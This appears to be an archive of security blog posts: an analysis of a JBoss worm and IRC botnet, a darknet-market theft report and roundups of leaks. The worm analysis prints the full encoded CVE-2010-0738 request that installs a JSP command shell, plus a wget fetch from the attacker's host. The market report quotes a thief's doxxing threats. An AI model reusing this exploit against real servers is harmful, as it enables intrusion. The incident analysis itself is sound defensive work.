Archive for the ‘hax’ Category

In case you missed it, yesterday Caleb .S tweeted about this. For the readers who are not familiar, Aero is one of the most popular darknet marketplaces. Unlike other marketplaces, Aero was considered secure and privacy oriented. Sometimes going to extreme levels like what you see below. If you tried to access it with JavaScript being enabled on your browser you were getting the following.

So, what happened there? For the past couple of days the administrators of this popular darknet marketplace say that their servers are under DDoS attack. This is nothing really important or uncommon and the administrators of Aero decided to fight it by spinning up more mirrors.

The plot twist though is that yesterday, threat actor “ChUcKyNbUcKy” stepped up and announced that Aero Server Wallet Tools was hacked on 08 November 2017 after its server got “rooted”. Below is the announcement threat actor “ChUcKyNbUcKy” made in Aero support forums.

ChUcKyNbUcKy successfully hacked the Aero Server Wallet Tools on 11/8/2017 after
previously rooted the host server and acquired administrator privileges. We have
compromised the login system and, after bypassing the 2fa login (10/15/2017), may
change PGP and account accounts and change the provider's PGP keys and collect customer
addresses for public release. The BTC and XMR are currently being channeled into CnB's
primary tumbling wallets, where everything is converted to XMR and "staggers" in a
similar way to BTC.
We do not explain how the core aero server was compromised, but we are not affiliated
with LEO or working in correspondence. However, you are aware of our activities. On the
first day, we started diverting the wallet system (withdrawals and deposits) to various
master wallets, we did about 300k and we worked with it about half of the day.
All announcements made by Aero employees are wrong, and they are essentially doing the
same thing we do now with any transactions to cover the losses, as we initially got admins
worth several BTC before they caught our spoofing method to have. The reason why they are
not completely shut down is that they would probably expect to end the fraud anyway.
To repeat that, we did not manipulate transactions in several days. We had stolen a
considerable amount of BTC in the first few days. The Aero admins fixed it, and that's why
some transactions worked. But she spoofs the wallet of user profiles to a master administrator
wallet that has been used since the launch of aero. And turn it into what they do.
As for doxxing, we are customers of certain vendors that we have targeted, not random customers.
We targeted these specific providers for PGP counterfeits. It was essentially the same method we
used to fake the BTC and XMR Wallet Keys for withdrawal. If you have ordered from INSTANTGRAM, GONEPOSTAL,
TRANQUILTREATS, THENOTORIOUS, EL_CHAPO, UK2UK, STEALTHPHORMIE, NIGHTPEOPLE, PILLENDOSE, REMEDYPLUS,
SOUTHERNWONDERZ, or DGSLABZ, BECAUSE PGP TRANSFERRED YOUR ADDRESS AND ACQUIRED YOUR ADDRESS.
Clean house smile
WE ALSO HAVE THE BTC FROM MANY THOSE SELLERS!
WE WILL DOx CUSTOMERS THERE! smile smile
UPDATE: We are currently targetting fraud and CC vendors wallets. We are directing DDOS on all
mirror links, making it harder for aero admins to steal bitcoin smile

The above suggests that threat actor “ChuckyNBucky” (also using the handle “ChuckyNBucky2”) is not only financially motivated but also wants the public attention and prove a point. Based on the above, here is a brief timeline that we can deduce from the post.

15OCT2017: Bypassed 2FA login system

?????2017: Got root access to the host server

08NOV2017: Access to Aero Server Wallet

08NOV2017: Diverting withdrawals and deposits to various master wallets($300k stolen before it got fixed)

02DEC2017: Targetting fraud and credit card vendors’ digital wallets

02DEC2017: DDoS Aero and its mirrors

Although the public announcement makes this an questionable case, there are a few lessons that we can learn from it that even large corporations fail to do. Specifically, the following two.

Take responsibility and act. If the provided information is correct it means that even though Aero administrators discovered and fixed the redirection of transactions, they never informed the victims of the attack. This is something very common even in legitimate businesses and it never ends up well.

DDoS is not only for disruption. Some, so-called, APT groups have been using DDoS to cover their activities for years now. DDoS provides enough noise and confusion to the victim to provide more time to the attackers. Never treat a DDoS as a common disruption attack, find out WHY it is happening.

Yesterday (03 November 2017), a threat actor leaked a database dump claiming to be originating from the e-Government services website of Florida, USA (Florida.gov). The file is in CSV format and contains 49771 records with the following fields:

Recently a friend of mine called me to investigate a hacked development server he had for some JBoss application development. I didn’t have enough time so I just cleaned up the server since it was an automated attack and informed him of its status.

Now that I found some time I can write this blog post. Just for clarification, if this was a 0day or some sophisticated hack I would never disclose any information, but since this is a very common, already known, automated attack I’m publishing this blog post.

After logging into the server it was pretty obvious that this was either a script kiddie or an automated/worm/virus attack just by checking the running processes with ‘ps’.

The first thing I did was to download a.tar.gz on my workstation in order to check it out. From a quick look at this it doesn’t seem like a serious hack. As I said earlier, it’s either a script kiddie or almost certainly some automated attack. The obvious thing to check next based on the simplicity of the attack is how it re-spawns new processes to download the new binaries and execute them.

A quick look in ‘/var/spool/cron/javadev’ file reveals the following cronjobs for the unprivileged user that was running the JBoss Application Server…

This is a very straightforward botnet client code that follows this algorithm:
1) Set username to efd[]
2) Obtain randomly a server of the ones defined in @sops if not hardcoded
3) Wait for 3 seconds and open a connection to this server on port 8080/tcp
4) Send an HTTP POST request (probably used for identification by the server to enable IRC communication)
5) Send NICK IRC command to set the previously defined username
6) Enter the IRC main loop
7) If you receive a PING respond with a PONG to keep the IRC connection alive
8) If you reveive a “welcome” message, join IRC channel #jbs and send the ‘uname -a’ output (with no spaces or new lines)
9) If you receive a message from user ‘iseee’ in the format of “.rsh [command]”, execute it in a shell and send back the output
10) If you receive a message from user ‘iseee’ in the format of “.get [URL] [times]”, download using ‘curl’ or ‘wget’ the provided URL and send back the location of the file
11) If you receive a message from user ‘iseee’ in the format of “.post [URL] [Bytes]”, connect to the given URL on port 80/tcp and send a HTTP POST request with “Content-Length” of the number of Bytes given in the IRC message

This overall simple IRC botnet client is executed through CRON so at least now we know what we are dealing with. Unfortunately, determining how the attacker got access was difficult since JBoss didn’t have any logging (it was just a development server).
However, from personal experience I was fairly convienced that this was the all time classic CVE-2010-0738 and a quick look in /home/javadev/jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml proves me right…

<!-- A security constraint that restricts access to the HTML JMX console
to users with the role JBossAdmin. Edit the roles to what you want and
uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
secured access to the HTML JMX console. -->
<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with the
role JBossAdmin to access the HTML JMX console web application
</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>
<login-config>
<auth-method>BASIC</auth-method>
<realm-name>JBoss JMX Console</realm-name>
</login-config>

Using the information of ‘ps’ shown in the beginning we can see that it follows this order:
1) Make directory named ‘…’ in hacked user’s home directory and move to that directory
2) Download ‘a.tar.gz’ from http://myiphone.dyndns-pics.com/a.tar.gz using ‘wget’
3) Extract ‘a.tar.gz’ to ‘xzf’ directory
4) Execute ‘alfa.sh’ shell script

Based on this we will first have to take a look at ‘alfa.sh’ shell script.

And if you don’t want to read the code, here is what it does:
1) It executes ‘treat.sh’ as a background process
2) If ‘/usr/local/bin/javad’ is already running, it exits
3) Executes Perl script ‘fix.pl’ as a background process
4) Compiles the C files using the included ‘Makefile’ (this time for Linux (see ‘lnx’ argument))
5) Removes ‘*.tar.gz’, ‘treat.sh’, ‘*.tar.gz.*’, ‘b.pl’ and ‘alfa.sh’ files
6) Runs ‘pns’ with options ‘-r JBoss’ (search for this response string), ‘-w “HEAD HTTP/1.0″‘ (write this request string), ‘-t 6100’ (connect/read/write time-out in milliseconds) on ports either 80 or 8080 (randomly selected) against hosts XXX.XXX.0.0/16 where XXX is a random integer from 0 to 255 and saves the result to ‘/tmp/sess_0088025413980486928597bfXXX’ where XXX is a random integer from 0 to 255.
7) Parses the output file
8) If it finds a vulnerable host, it is attacking to it by sending the malicious HEAD request to its JMX console
9) If the server responds with a 200 or 500 code, then sends a ‘GET /zecmd/zecmd.jsp’ request to see if it was successfully infected
10) If this is the case, it uses ‘comments’ parameter to download, extract and execute ‘a.tar.gz’ to the remote host as it did on this one

This means that in order to better understand the worm we have to first see what ‘treat.sh’ shell script does. Again, the script was slightly modified/obfuscated but nothing really special. Here is the de-obfuscated ‘treat.sh’ shell script.

And here is what this one does:
1) Constructs file ‘sysdbss.c’
2) File ‘fix.pl’ is copied to ‘~/.sysync.pl’ and the latter file’s permissions are changed to be executable
3) The cronjobs (we saw earlier) is prepared and installed in cron (temporarily stored in /tmp/myc)
4) ‘sysdbss.c’ is compiled using gcc and installed in ‘~/.sysdb’
5) All the temporary files and initial scripts are removed

By now we know exactly what files have been altered, how was our system infected as well as how the worm is spreading and what is used for. However, we still miss some crucial points. Let’s see how the vulenrability was exploited. We have the malicious HTTP payload which is URL encoded. Here is the encoded one:

HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=zecmd.war&argType=java.lang.String&arg1=zecmd&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True HTTP/1.0\r\n\r\n

It’s a call to invokeOpByName() routine with request type of “DeploymentFileRepository” in order to deploy a new WAR file named ‘zecmd.war’ that includes a JSP web page named ‘zecmd.jsp’ which is a common JSP based shell that executes anything passed to it through “comment” parameter. This is using the misconfigured JMX console we saw earlier to execute this HEAD request and install this JSP backdoor.

Now that we also know exactly how system was exploited the only thing left is to check out the rest of the files that are used in this worm. Just for reference, here is the ‘Makefile’ used to compile the C programs included in the TAR archive.

This was a recent discovery by Chris Evans and you can read more details in his blog post available here. Furthermore, you can find information about this incident at The H Open as well as LWN.net websites.

So, the backdoor affects specifically 2.3.4 version of the popular FTP daemon and can be found in str.c file which contains code for handling the string manipulation routines.

Another quick update on the recent hacks and similar news that made it to the public.

vendor-sec Mailing List
Hehe… This is a cute little story that you can read on various sites. For example, check out this CNET article. According to Marcus Meissner (moderator of the list), their private mailing list was being sniffed at least since January 20. Of course, Mr. M. Meissner though it would be polite to let the mailing list members know about his discovery of the compromise by emailing them and then living the backdoored system online. This resulted in getting ultra-pwned by seeing the mailing list getting rm’d (quite expected after his disclosure of the hack). Happily for some people… Tango down! ;P

EMC RSA Hack
Another high profile hack in the security industry. Check out this post of ComputerWorld to get an idea. Unfortunately, the information regarding this issue are limited to the official company’s statements and this makes it quite difficult knowing what really happened/is happening.

Anonymous vs Bank of America
Basically, you can get an overview of this operation either from the countless news websites such as this one or using Bank of America Suck. I can still recall many so-called “security experts” making fun of Anonymous a couple of years ago. Where are they now?

Anonymous on Bradley Manning’s Side
From the Forbes blog we can read this post about Anonymous’ actions regarding the absolutely unfair and inhuman treatment of Bradley Manning.

French Ministry of Finance Ownage
Another recent and very interesting attack. Here are some information from the Sophos NakedSecurity blog.

PHP.NET Compromise
From Full-Disclosure mailing list we have seen this email today. However, there is still no official report from PHP project and the given website states that the codebase was not backdoored, just altered for demonstration purposes. Currently, the project’s official wiki is offline.

I might have missed some public high profile hack(s) but I think I have included the most important. If you think there should be something more here, leave a comment to let me know. :)

Unfortunately, I didn’t have time to blog about all the neat recent hacks that took place. For this reason I’ll publish this post that basically summarizes the most important (in my opinion) hacks.

– Gregory D. Evans / LIGATT Security Ownage
You can find everything you need at the attrition.org‘s website here. You know, this is one of the attacks that most people knew it was coming and it makes perfectly sense to both the security industry and security enthusiasts seeing Gregory D. Evans getting owned like this.

– Nasdaq Hack
I don’t know anything apart from what’s already public regarding this hack. Consequently, I won’t comment anything here. You can find information in all the major news media sites such as Reuters, CNBC, MSN Breaking News, etc.

– rootkit.com ownage
Most people interested in computer security are aware of rootkit.com which is a community interested in everything about rootkits. It was created on 1999 and many members occasionally release techniques and tools mainly regarding rootkit development. Yesterday their hacked MySQL database was released to public through stfu.cc website.

– HBGary Ownage
Another recent attack to a whitehat is this one. This was a payback attack from the Anonymous who also released more than 4.5GB of private data via torrent which you can find here. Their message to HBGary is:

Greetings HBGary (a computer "security" company),
Your recent claims of "infiltrating" Anonymous amuse us, and so do your attempts at using Anonymous as a means to garner press attention for yourself. How's this for attention?
You brought this upon yourself. You've tried to bite at the Anonymous hand, and now the Anonymous hand is bitch-slapping you in the face. You expected a counter-attack in the form of a verbal braul (as you so eloquently put it in one of your private emails), but now you've received the full fury of Anonymous. We award you no points.
What you seem to have failed to realize is that, just because you have the title and general appearence of a "security" company, you're nothing compared to Anonymous. You have little to no security knowledge. Your business thrives off charging ridiclous prices for simple things like NMAPs, and you don't deserve praise or even recognition as security experts. And now you turn to Anonymous for fame and attention? You're a pathetic gathering of media-whoring money-grabbing sycophants who want to reel in business for your equally pathetic company.
Let us teach you a lesson you'll never forget: you don't mess with Anonymous. You especially don't mess with Anonymous simply because you want to jump on a trend for public attention, which Aaron Barr admitted to in the following email:
"But its not about them...its about our audience having the right impression of our capability and the competency of our research. Anonymous will do what every they can to discredit that. and they have the mic so to speak because they are on Al Jazeeera, ABC, CNN, etc. I am going to keep up the debate because I think it is good business but I will be smart about my public responses."
You've clearly overlooked something very obvious here: we are everyone and we are no one. If you swing a sword of malice into Anonymous' innards, we will simply engulf it. You cannot break us, you cannot harm us, even though you have clearly tried...
You think you've gathered full names and home addresses of the "higher-ups" of Anonymous? You haven't. You think Anonymous has a founder and various co-founders? False. You believe that you can sell the information you've found to the FBI? False. Now, why is this one false? We've seen your internal documents, all of them, and do you know what we did? We laughed. Most of the information you've "extracted" is publicly available via our IRC networks. The personal details of Anonymous "members" you think you've acquired are, quite simply, nonsense.
So why can't you sell this information to the FBI like you intended? Because we're going to give it to them for free. Your gloriously fallacious work can be a wonder for all to scour, as will all of your private emails (more than 44,000 beauties for the public to enjoy). Now as you're probably aware, Anonymous is quite serious when it comes to things like this, and usually we can elaborate gratuitously on our reasoning behind operations, but we will give you a simple explanation, because you seem like primitive people:
You have blindly charged into the Anonymous hive, a hive from which you've tried to steal honey. Did you think the bees would not defend it? Well here we are. You've angered the hive, and now you are being stung.
It would appear that security experts are not expertly secured.
We are Anonymous.
We are legion.
We do not forgive.
We do not forget.
Expect us - always.
---
Quick 'n dirty way to read the emails in a human-readable format:
1. Get a client. http://www.mozillamessaging.com/thunderbird/
2. Get a file renaming tool. http://www.bulkrenameutility.co.uk/Download.php (Windows)
3. Rename all the mail files so that they have a .eml extension.
4. Drag & drop them into Thunderbird.
5. Enjoy.

– EU Carbon Trading Hack
This another of these attacks that I cannot comment since I have zero knowledge beyond what’s already said by the media. So, here are a couple of links for the interested reader… CBS News, The Register, BusinessWeek, etc. This a very interesting subject especially for Greece since it involves data from stolen accounts from Greece among other countries.

I’m fairly sure that there are many more attacks such as the “Egyptian government hacks” one on high profile systems but I’m trying to blog just about the most important (always in my opinion). Feel free to contact me if I missed some cool recent hack. :)

It’s been a couple of months since I first heard this as a rumor. Finally, after quite a long period it’s publicly available via torrent and various mirror sites. Earlier today Kaspersky Labs made an official statement regarding this source code leak case (you can read about it here) saying that this code was stolen by a former employee and it was part of the 2008 customer products. That person was arrested and received a a three year suspended prison sentence.